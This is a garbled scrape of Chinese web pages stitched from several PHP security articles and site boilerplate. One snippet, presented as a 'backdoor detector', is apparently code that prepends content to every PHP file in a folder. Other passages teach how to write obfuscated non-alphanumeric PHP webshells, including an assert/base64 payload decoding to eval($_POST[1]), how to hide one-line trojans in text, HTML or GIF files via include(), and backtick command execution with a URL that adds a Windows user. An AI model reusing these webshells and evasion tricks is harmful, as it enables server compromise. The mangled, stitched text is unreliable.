PHP在线源码后门检测。

& & 总是忘记一句话放到哪个文件里去了,直接全部干掉...& & 复制代码代码如下:& & <?//xy7& & if&(!isset($dir)&or&empty($dir))&{& & $dir=str_replace('\\','/',dirname(__FILE__));& & echo&"".$dir."";& & }&else&{& & $dir=$_GET['dir'];& & echo&"".$dir."";& & }& & $evilcode="";& & $testdir&=&opendir($dir);& & while($filea&=&@readdir($testdir)){& & if(strstr($filea,&'.php')){& & $fp&=&@fopen($filea,&'r+');& & if&(!strstr(@fread($fp,&20),&'xy7')){& & rewind($fp);& & $old&=&@fread($fp,&filesize($filea));& & rewind($fp);& & fwrite($fp,&$evilcode&.&$old);& & }& & fclose($fp);& & }& & }& & closedir($testdir);& & ?>& & & & & & & & 被X的文件& & 时间& & 大小& & & & <?php& & $dirs=@opendir($dir);& & while&($file=@readdir($dirs))&{& & if&((is_file($file))&and&(ereg("\.php{0,1}$",$file)))& & {$b="$dir/$file";& & $a=@is_dir($b);& & if($a=="0"){& & $size=@filesize("$dir/$file");& & $lastsave=@date("Y-n-d&H:i:s",filectime("$dir/$file"));& & echo&"\n";& & echo&"$file\n";& & echo&"&$lastsave\n";& & echo&"&$size&Bytes\n";& & }& & }& & }& & @closedir($dirs);& & ?>& & codz&by&xuanmumu& & & & 您可能感兴趣的文章:php后门URL的防范超小PHP小马小结(方便查找后门的朋友)PHP隐形一句话后门,和ThinkPHP框架加密码程序(base64_decode)一些 PHP 管理系统程序中的后门php木马webshell扫描器代码PHP Web木马扫描器代码 v1.0 安全测试工具Ha0k 0.3 PHP 网页木马修改版全世界最小的php网页木马一枚 附PHP木马的防范方法asp,php一句话木马整理方便查找木马一个不易被发现的PHP后门代码解析& & QQ空间
百度搜藏更多& & Tags:清除 一句话 后门& & 复制链接收藏本文打印本文关闭本文返回首页& & 上一篇:asp和php下textarea提交大量数据发生丢失的解决方法& & 下一篇:一个不易被发现的PHP后门代码解析& & 相关文章php 表单提交大量数据发生丢失的解决方法PHP rawurlencode与urlencode函数的深入分析php中理解print EOT分界符和echo EOT的用法区别小结用PHP获取Google AJAX Search API 数据的代码让Nginx支持ThinkPHP的URL重写和PATHINFO的方法分享php连接mssql的一些相关经验及注意事项PHP关于htmlspecialchars、strip_tags、addslashes的解释PHP常用技巧总结(附函数代码)php的一个登录的类 [推荐]php 数组操作(增加,删除,查询,排序)等函数说明& & 文章评论& & 最 近 更 新& & 无JS,完全php面向过程数据分页实现代码php 获取SWF动画截图示例代码PHP array_flip() 删除重复数组元素专用函php导出excel格式数据问题谨慎使用PHP的引用原因分析php中用date函数获取当前时间有误的解决办php !function_exists("T7FC56270E7php 将bmp图片转为jpg等其他任意格式的图PHP缓存技术的多种方法小结php不写闭合标签的好处& & 热 点 排 行& & php中iconv函数使用方法PHP 页面跳转到另一个页面的多种PHPMyadmin 配置文件详解(配置)php字符串截取问题火车头采集器3.0采集图文教程php出现Cannot modify header in特详细的PHPMYADMIN简明安装教程php中json_decode()和json_encodphp下intval()和(int)转换使用与require(),include(),require_on
声明:该文章系网友上传分享,此内容仅代表网友个人经验或观点,不代表本网站立场和观点;若未进行原创声明,则表明该文章系转载自互联网;若该文章内容涉嫌侵权,请及时向
论文写作技巧
上一篇:下一篇:
相关经验教程编写变态的(非字母数字的)PHP后门 -
| 关注黑客与极客
编写变态的(非字母数字的)PHP后门
共164952人围观
,发现 40 个不明物体
& 在这篇文章中,我将向大家介绍如何编写一个非字母数字的PHP后门。在编写这种PHP后门的时候,我们首先需要了解一些基础知识:
&&&&(1)了解PHP
&&&&(2)了解curl或者其他一些能够操作HTTP请求的工具
& 还有一点需要大家了解的是PHP中异或(^)的概念。对于异或,大家肯定都有所了解,但是平常能用到的地方可能不多,最起码本人不经常使用(勿喷)。之所以在这里强调一下异或的概念,是因为异或在这种非字母数字的PHP后门中经常使用并且非常重要。
先来看下面一段代码:
&&&&echo&&A&&^&&}&;
& 运行这段代码,那么输出的结果是字符&&&,之所以会得到这样的结果,是因为代码中对字符&A&和字符&}&进行了异或操作。在PHP中,两个变量进行异或时,会将字符串转换成二进制再进行异或,异或完,又将结果从二进制转换成了字符串。异或操作有时也被用来交换两个变量的值。
& 我们都知道,PHP是弱类型的语言,也就是说在PHP中我们可以不预先声明变量的类型,而直接声明一个变量并进行初始化或赋值操作。正是由于PHP弱类型的这个特点,我们对PHP的变类型进行隐式的转换,并利用这个特点进行一些非常规的操作。如将整型转换成字符串型,将布尔型当作整型,或者将字符串当作函数来处理,下面我们来看一段代码:
&&&&$__=&&&^&}&;
&&&&$__(&stuff&);
& 看到这段代码,大家或许会觉得很疑惑,下面我简单的来解释一下:
& (1)$_++;这行代码的意思是对变量名为&_&的变量进行自增操作,在PHP中未定义的变量默认值为null,null==false==0,我们可以在不使用任何数字的情况下,通过对未定义变量的自增操作来得到一个数字。
& (2)$__=&&&^&}&;对字符&&&和&}&进行异或运算,得到结果A赋给变量名为&__&(两个下划线)的变量
& (3)$__(&stuff&);通过上面的赋值操作,变量$__的值为A,所以这行可以看作是A(&stuff&),在PHP中,这行代码表示调用函数A,但是由于程序中并未定义函数A,所以这行代码会抛出一个致命错误使程序停止运行。这行代码没什么实际的意义,但是它能简单体现出在PHP中,我们可以将字符串当作函数来处理。
& 文章进行到这里,大家如果再看到类似的PHP后门应该不会那么迷惑了,你可以通过一句句的分析后门代码来理解后门想实现的功能。如果你依然迷惑,那说明本菜鸟的文章写的不好,先说声抱歉了,但是还是希望你别骂我。
& 上面的那段示例代码最后会出错,导致程序停止运行,当然写出一个出错的程序并不是我们的目的,使用这种后门的主要目的是创建一些可以绕过检测的并且对我们有用的字符串,如_POST&, &system&, &call_user_func_array&,或者是任何我们需要的东西。
& 下面是个非常简单的非数字字母的PHP后门:
&&&&@$_++;&//&$_&=&1
&&&&$__=(&#&^&|&);&//&$__&=&_
&&&&$__.=(&.&^&~&);&//&_P
&&&&$__.=(&/&^&`&);&//&_PO
&&&&$__.=(&|&^&/&);&//&_POS
&&&&$__.=(&{&^&/&);&//&_POST&
&&&&${$__}[!$_](${$__}[$_]);&//&$_POST[0]($_POST[1]);
& 我们甚至可以将上面的代码合并为一行,从而使程序的可读性更差,代码如下:
$__=(&#&^&|&).(&.&^&~&).(&/&^&`&).(&|&^&/&).(&{&^&/&);
& 按照文章最开始的讲解对代码进行分析,我们知道这是一个可以进行函数调用的PHP后门。& 希望这篇文章能给大家带来一些帮助。& 最后,没有最后!
&?php$a=&`!@#$%^&*()_+~-=\\|][}{\&&;:?/.,&&&;$a1=str_split($a);for ($i=0; $i & count($a1); $i++) {
for ($j=0; $j & count($a1)-1; $j++) {
echo $a1[$i] .& + &.$a1[$j] .&=&. ($a1[$i] ^$a1[$j]);
echo &&br&&; }}-------fuzz
阿里巴巴安全工程师
&?php$_=&&;$_[+$_]++;$_=$_.&&;$___=$_[+&&];//A$____=$___;$____++;//B$_____=$____;$_____++;//C$______=$_____;$______++;//D$_______=$______;$_______++;//E$________=$_______;$________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;//O$_________=$________;$_________++;$_________++;$_________++;$_________++;//S$_=$____.$___.$_________.$_______.&6&.&4&.&_&.$______.$_______.$_____.$________.$______.$_______;$________++;$________++;$________++;//R$_____=$_________;$_____++;//T$__=$___.$_________.$_________.$_______.$________.$_____;$__($_(&ZXZhbCgkX1BPU1RbMV0p&));
//ASSERT(BASE64_DECODE(&ZXZhbCgkX1BPU1RbMV0p&));//ASSERT(&eval($_POST[1])&);//key:=1?&
必须您当前尚未登录。
必须(保密)
这家伙太懒,还未填写个人描述!
分享每日精选文章PHP语言编写的源码程序,我需要找出里面所有的后门。
时间: 17:23&&文章来源:网络整理作者:建网360&&&
通过猿人邦网 ,保证身份真实可靠
完成 ,保证能随时联系到服务商
具体要求:
一套PHP语言编写的源码程序。以前自己用过。但是时间太久了。都忘了。里面留的后门。包括CNN统计,,都不记的了。我需要全部都找出来重新设置。包括在哪个文件。密码设置在哪?怎么连接?有能力的可以联系我的QQ:
参与报价,开始挣钱
成为服务商,参与报价
您还可以看其他相关文章
猪八戒网用户()【悟能也能】在分类发布需求:教育培训行业p2p类型的网站建设。具体要求:我需要一个...
猪八戒网用户()【悟能也能】在分类发布需求:教育培训行业p2p类型的网站建设。具体要求:我需要一个...
猪八戒网用户()【open_p9nutjki】在分类发布需求:网站前端设计、把现有的网上多用户商城改成响应式模板...
猪八戒网用户()【m_052108btzc】在分类发布需求:简单的返利网制作。具体要求:参考:(1) (...
@jianwang360&版权所有&&&&地址:北京市朝阳区东三环双井桥东首城国际B座1516室 |黑客隐藏PHP文件后门的技巧
最近很多朋友都在问我是否能把我那一句话木马隐藏到HTML或图片里,其实把一句话木马插入到PHP文件中就已经很隐蔽了,如果说硬是要放到HTML文件或图片里,就接着往下看的这篇测试报告吧。& 要知道如果光把PHP语句放到图片里是无论如何也不能执行的,因为PHP只解析扩展名为php的文件。所以说要能使隐藏在图片里的PHP语句执行。我们就的借助PHP中的调用函数 :include 、require 等。
  我们还记得前些日子把木马隐藏到图片的文章吧。也就是在PHP文件里用include(&x.gif&)这样的语句来调用隐藏在图片的木马语句。ASP中语句也类似。看似非常隐蔽但直接调用图片对稍微懂点PHP的人就不难发现可疑之处。由于URL 里用GET方式很难传递参数,这就使得插入木马的性能得不到发挥。
  Include 函数在PHP中使用的比较频繁,所以引起的安全问题也实在太多,例如PHPWIND1.36的漏洞就是因为include后面的变量没做过滤引起的。由此我们就可以构造类似的语句来插入到PHP文件中。然后把木马隐藏到图片或HTML文件里,可以说隐蔽性就更高了。如在PHPWIND论坛里插入下面的语句:
&&&& <&&?@include includ/.$PHPWIND_ROOT;? >
  一般管理员是无法看出来的。
  有了include 函数来辅助帮忙我们就可以把PHP木马隐藏到 诸如 txt、html和图片文件等很多类型的文件里来了。因为txt、html和图片文件这三种类型的文件最无论在论坛还是文章系统里是最为常见的了,下面我们就依次来做测试。
  首先建立一PHP文件test.php 文件内容为:
&&& $test=$_GET[test];&&& @include test/.$test&&& ?>
  Txt文件一般都是说明文件,所以我们把一句话木马放到目录的说明文件里就OK了。随便建立一个TXT文件t.txt。我们把一句话木马粘贴到t.txt文件里。然后访问 hxxp://localhost/test/test.php?test=../t.txt 如果你看到t.txt的内容就证明Ok了, 然后把在lanker微型PHP后门客户端 木马地址添入 hxxp://localhost/test/test.php?test=../t.txt 密码里添入cmd就可以了,执行返回的结果都可以看到。
  对于HTML的文件,一般都为模版文件。为了使插入到HTML的文件的木马能被调用执行而且不被显示出来,我们可以在HTML里加入一个隐藏属性的文本框 ,如: 然后使用方法同上。执行的返回结果一般都可以查看源文件看到。 如使用查看本程序目录功能。查看源文件内容为 我可以得到目录为 C:Uniserver2_7swww est。
  下面我们说说图片文件,要说最为毒的一招莫过于把木马隐藏到图片里。我们可以直接对一个图片进行编辑,把插入到图片末尾
  经测试一般都不会对图片造成影响。然后同样方法客户端木马地址添入
  我们查看PHP环境变量 返回的是结果是原图片。
  这里可能要和我们想象的结果有些差距了,其实命令已经运行了,只是返回的结果看不到而已,因为这是真正的GIF文件,所以是不会显示返回结果的,为了证明是否真的执行了命令我们 执行上传文件命令。果不出所料,文件已经成功上传到服务器上。这样伪造的优点是隐蔽性好。缺点也自然不用说了是没回显。如果你想看到返回的结果,那就拿出记事本伪造一个假的图片文件吧。
评论列表(网友评论仅供网友表达个人看法,并不表明本站同意其观点或证实其描述)php代码的一个秘密可用于网站后门
PS:这个PHP秘密并不是我发现的,看到这个比较新奇,做个总结和大家分享一下!
在一个文档里,据发现者表示,如果在PHP代码中,变量echo `$test`;会导致执行结果和system();一样的效果,测试了一下,觉得还是非常强大的,对于普通的一句话木马,大多webshell工具都可以检查或杀毒软件查杀,但如果利用以上方法,我想,一些检查工具都是摆设了吧,即使是手工检查,& 和`你能分辨出来吗?如果在不知道有些奇技淫巧的话,检查这类后门是不是很无语啊,下面我们就来看看真像!
$test = $_GET['w'];
echo `$test`;
在上面代码中,echo `$test` (注意:`是esc 下面的键的,不是单引号),变量被`符号括起来了,代码运行于windows系统,可以达到system()一样的效果,命令执行!在linux环境未测试,有兴趣的可以测试一下,分享一下结果,
/bug.php?w= net user x-bug 1234 /add
【声明】:黑吧安全网()登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱,我们会在最短的时间内进行处理。
上一篇:【】【】}

我要回帖

更多关于 怎么看源码有没有后门 的文章

更多推荐

版权声明:文章内容来源于网络,版权归原作者所有,如有侵权请点击这里与我们联系,我们将及时删除。

点击添加站长微信